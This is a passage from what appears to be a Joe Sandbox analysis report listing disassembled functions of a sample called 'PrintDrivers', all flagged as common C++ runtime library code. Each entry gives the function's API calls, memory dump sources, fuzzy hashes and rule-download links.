                                                                    • __freea.LIBCMT ref: 005B7CD8
                                                                      • Part of subcall function 005B68F8: HeapAlloc.KERNEL32(00000000,00000001,00581AC0,?,005A5BEE,00581AC2,00581AC0,?,?,?,0058F95C,00581AC4,00581AC4), ref: 005B692A
                                                                    • __freea.LIBCMT ref: 005B7CE1
                                                                    • __freea.LIBCMT ref: 005B7D04
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 1096550386-0
                                                                    • Opcode ID: 04844912e2e8dcd25d6b72e93009d4619361c919d9afafba475d5fc0fe150f6d
                                                                    • Instruction ID: 05e247e998b96890a225b5a06a0484e26c669c89640830572fb322c6cd45f259
                                                                    • Opcode Fuzzy Hash: 04844912e2e8dcd25d6b72e93009d4619361c919d9afafba475d5fc0fe150f6d
                                                                    • Instruction Fuzzy Hash: 6151BF7260421EAFEB215F649C46EFB3FA9FBC9750F254529FD04AB140EB70ED0086A0
                                                                    Function 005A3B47 Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 005A3B90
                                                                    • __alloca_probe_16.LIBCMT ref: 005A3BBC
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 005A3BFB
                                                                    • __alloca_probe_16.LIBCMT ref: 005A3C6F
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 005A3CD0
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$__alloca_probe_16
                                                                    • String ID:
                                                                    • API String ID: 2135360126-0
                                                                    • Opcode ID: e8b27180e7ea00a479015f719d9f322bd2e20b767665617216780ee9ccc0f729
                                                                    • Instruction ID: 0c0ba32e32bbe3861436acfa457ac5ddeb5b0386464ce8a474c00a3fa7088e60
                                                                    • Opcode Fuzzy Hash: e8b27180e7ea00a479015f719d9f322bd2e20b767665617216780ee9ccc0f729
                                                                    • Instruction Fuzzy Hash: 7051C37290020AABDF209F65CC59FAF7FA9FF86768F254425F904A6150E731CE14CBA0
                                                                    Function 0058AF50 Relevance: 7.6, APIs: 5, Instructions: 105COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0058AF7D
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0058AFA0
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0058AFC8
                                                                    • std::_Facet_Register.LIBCPMT ref: 0058B02D
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0058B057
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                    • String ID:
                                                                    • API String ID: 459529453-0
                                                                    • Opcode ID: 27c2298f9fa4a70f569cb106b6d8b6d7156954dec7c37a42a11148f3adbcd265
                                                                    • Instruction ID: 99b1369f639df251ec2a1a88af2b84927193f8fb583cadf337a245e6e6e0b1fd
                                                                    • Opcode Fuzzy Hash: 27c2298f9fa4a70f569cb106b6d8b6d7156954dec7c37a42a11148f3adbcd265
                                                                    • Instruction Fuzzy Hash: 7531F331D00255DFDB11EF54C989BAEBFB4FF14314F284259E854AB292D731AE06CB81
                                                                    Function 00590ECC Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00590ED3
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00590EDD
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • numpunct.LIBCPMT ref: 00590F17
                                                                    • std::_Facet_Register.LIBCPMT ref: 00590F2E
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00590F4E
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                    • String ID:
                                                                    • API String ID: 743221004-0
                                                                    • Opcode ID: 4f8a7119fabc06fe8e33613c4602ae7e5588cfe02a7c3b5fe248ad6262e0ac7f
                                                                    • Instruction ID: ee8d3f97ae0d36f270cbcb8fc890fa46eeae2ebf574b3d063a862933bb7260c5
                                                                    • Opcode Fuzzy Hash: 4f8a7119fabc06fe8e33613c4602ae7e5588cfe02a7c3b5fe248ad6262e0ac7f
                                                                    • Instruction Fuzzy Hash: 461170359006169FCF15EBA0C859ABE7F61FFC4320F655948F915AB2D1DF709E068B80
                                                                    Function 0059603F Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00596046
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00596050
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • messages.LIBCPMT ref: 0059608A
                                                                    • std::_Facet_Register.LIBCPMT ref: 005960A1
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005960C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                    • String ID:
                                                                    • API String ID: 2750803064-0
                                                                    • Opcode ID: 3287ccdb12de24f13d02f75fc969129fda83f6714a86a291eaace1b27499d921
                                                                    • Instruction ID: ec52f19b94c9f0c586e27c1fbc19d0774e10f4d8c1c73e9b1a149c1632db8afe
                                                                    • Opcode Fuzzy Hash: 3287ccdb12de24f13d02f75fc969129fda83f6714a86a291eaace1b27499d921
                                                                    • Instruction Fuzzy Hash: 1001AD3590011A9BCF09EBA0884DABE7FA5FFC4320F644548F810AB291DFB49E09CB91
                                                                    Function 00596328 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0059632F
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00596339
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • moneypunct.LIBCPMT ref: 00596373
                                                                    • std::_Facet_Register.LIBCPMT ref: 0059638A
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005963AA
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID:
                                                                    • API String ID: 419941038-0
                                                                    • Opcode ID: 9f24b02af563c444c00dfc678e154cdbfd7d41ee83fda585fc08bc7d6e54bb27
                                                                    • Instruction ID: 5aa17ce69c5863bc45ef03fc9a6b0d7002292d622a436bfe387231e206a42508
                                                                    • Opcode Fuzzy Hash: 9f24b02af563c444c00dfc678e154cdbfd7d41ee83fda585fc08bc7d6e54bb27
                                                                    • Instruction Fuzzy Hash: 6301AD3590011A9BCF05EBA0C889ABE7FB1FFC4320F240508E850AB2D1DF709E49DB81
                                                                    Function 005963BD Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005963C4
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005963CE
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • moneypunct.LIBCPMT ref: 00596408
                                                                    • std::_Facet_Register.LIBCPMT ref: 0059641F
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0059643F
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID:
                                                                    • API String ID: 419941038-0
                                                                    • Opcode ID: 0be98de37285c8c795d3f9712c47959d464c888563689ee193dc60f1f680e352
                                                                    • Instruction ID: 3a9cca744e6be4e583bc34bdeee1c596ee191c303c41c5be42de0c88080a78da
                                                                    • Opcode Fuzzy Hash: 0be98de37285c8c795d3f9712c47959d464c888563689ee193dc60f1f680e352
                                                                    • Instruction Fuzzy Hash: A10161359002169BCF05FBE48889ABE7FB1FF84320F544509E855AB292DF719E098B81
                                                                    Function 00596452 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00596459
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00596463
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • moneypunct.LIBCPMT ref: 0059649D
                                                                    • std::_Facet_Register.LIBCPMT ref: 005964B4
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005964D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID:
                                                                    • API String ID: 419941038-0
                                                                    • Opcode ID: 5480e7f6054c601638939b36df0bdb5310172aee309310c988e08ddf72cd9d93
                                                                    • Instruction ID: 02a319c85a9b95ff8c6473cb25146c18e622266a90ea0e6d20975a9e7dc88886
                                                                    • Opcode Fuzzy Hash: 5480e7f6054c601638939b36df0bdb5310172aee309310c988e08ddf72cd9d93
                                                                    • Instruction Fuzzy Hash: B001A1359001269BCF05EBA0C959ABD7FA1FFC4710F154508E8196B291DF709E09CB80
                                                                    Function 005964E7 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005964EE
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005964F8
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • moneypunct.LIBCPMT ref: 00596532
                                                                    • std::_Facet_Register.LIBCPMT ref: 00596549
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00596569
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID:
                                                                    • API String ID: 419941038-0
                                                                    • Opcode ID: 134387417ae83d5880854e82e4066d439003b3b342e9d25b5f0d65bfed55a888
                                                                    • Instruction ID: 98d19d7547cb419830ef85fe39b42e983c2d0a09b2706708460c1bcf7e92c4f9
                                                                    • Opcode Fuzzy Hash: 134387417ae83d5880854e82e4066d439003b3b342e9d25b5f0d65bfed55a888
                                                                    • Instruction Fuzzy Hash: 42016D3590061A9FCF05FBA48959ABE7FA1FFC4320F654509E815AB291DF709E0ACB81
                                                                    Function 005966A6 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005966AD
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005966B7
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • numpunct.LIBCPMT ref: 005966F1
                                                                    • std::_Facet_Register.LIBCPMT ref: 00596708
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00596728
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                    • String ID:
                                                                    • API String ID: 743221004-0
                                                                    • Opcode ID: 0dfeb009a9a1336ebd17b30a6ac8c29529e1d9bae25fc9646c20c7017541e700
                                                                    • Instruction ID: 5c1a8c581f19e878a6639cf7f0b1f384e399169bde823ee31feb7c76125e4f2e
                                                                    • Opcode Fuzzy Hash: 0dfeb009a9a1336ebd17b30a6ac8c29529e1d9bae25fc9646c20c7017541e700
                                                                    • Instruction Fuzzy Hash: 4A016D3590012A9FCF05EBA4C859ABE7FB1FF84710F244509E851AB291EF709E0A8B81
                                                                    Function 005A0715 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A071C
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005A0726
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • collate.LIBCPMT ref: 005A0760
                                                                    • std::_Facet_Register.LIBCPMT ref: 005A0777
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005A0797
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                    • String ID:
                                                                    • API String ID: 1007100420-0
                                                                    • Opcode ID: 7b85bb12f90be4d75e7d53eb90db03f057ed75dc1504d703d10534cde940c0c0
                                                                    • Instruction ID: e85c049705d13c326501ada00ec5f0b96ec32fc3c544c1d5e037f3b547a8ce20
                                                                    • Opcode Fuzzy Hash: 7b85bb12f90be4d75e7d53eb90db03f057ed75dc1504d703d10534cde940c0c0
                                                                    • Instruction Fuzzy Hash: B301A13590022A9BCF05EBA0C849ABD7FB1FFC5320F141509E4146B2D1DF70AE058B81
                                                                    Function 005A07AA Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A07B1
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005A07BB
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • messages.LIBCPMT ref: 005A07F5
                                                                    • std::_Facet_Register.LIBCPMT ref: 005A080C
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005A082C
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                    • String ID:
                                                                    • API String ID: 2750803064-0
                                                                    • Opcode ID: f4a37311e9aef5a932685ce83aba0b13768e0363fcb6f01901546f3dbb5e34cd
                                                                    • Instruction ID: 538c1b772ec8dec9c1bcd139bfb9f8e98015eea9b1340b675de2b5e18074ba0c
                                                                    • Opcode Fuzzy Hash: f4a37311e9aef5a932685ce83aba0b13768e0363fcb6f01901546f3dbb5e34cd
                                                                    • Instruction Fuzzy Hash: A90182359002178BCB05ABA08849ABD7FA1FBC5320F150508E4616B2D1DF749E468BC1
                                                                    Function 005A0969 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A0970
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005A097A
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • moneypunct.LIBCPMT ref: 005A09B4
                                                                    • std::_Facet_Register.LIBCPMT ref: 005A09CB
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005A09EB
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID:
                                                                    • API String ID: 419941038-0
                                                                    • Opcode ID: b9f89996a415d7bd5aed113a54aaf0c86d6a8ac63dfd112ea58497a7fa838df6
                                                                    • Instruction ID: c17f95d715af25b26ff8672a1e438b8fbc91509e1815a4c949b2625128222b7c
                                                                    • Opcode Fuzzy Hash: b9f89996a415d7bd5aed113a54aaf0c86d6a8ac63dfd112ea58497a7fa838df6
                                                                    • Instruction Fuzzy Hash: 9501A13590021A8FDF05EBA48849ABF7FA1FFC5310F240508F455AB2D2DF749E468B81
                                                                    Function 005A09FE Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A0A05
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005A0A0F
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • moneypunct.LIBCPMT ref: 005A0A49
                                                                    • std::_Facet_Register.LIBCPMT ref: 005A0A60
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005A0A80
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID:
                                                                    • API String ID: 419941038-0
                                                                    • Opcode ID: 7026d152f0cf04fe6029656bbcc56421b2e135f38b9ebf54b2768078441ee6b7
                                                                    • Instruction ID: cf636241f89fa68d440448edd1478786a9775cc95c6ee895cc4e44d05d83f666
                                                                    • Opcode Fuzzy Hash: 7026d152f0cf04fe6029656bbcc56421b2e135f38b9ebf54b2768078441ee6b7
                                                                    • Instruction Fuzzy Hash: 0901AD3590021A9BCB05EBA4C849ABE7FB1FFC5310F245508F815AB2D2DF709E06CB80
                                                                    Function 00595D56 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00595D5D
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00595D67
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • codecvt.LIBCPMT ref: 00595DA1
                                                                    • std::_Facet_Register.LIBCPMT ref: 00595DB8
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00595DD8
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
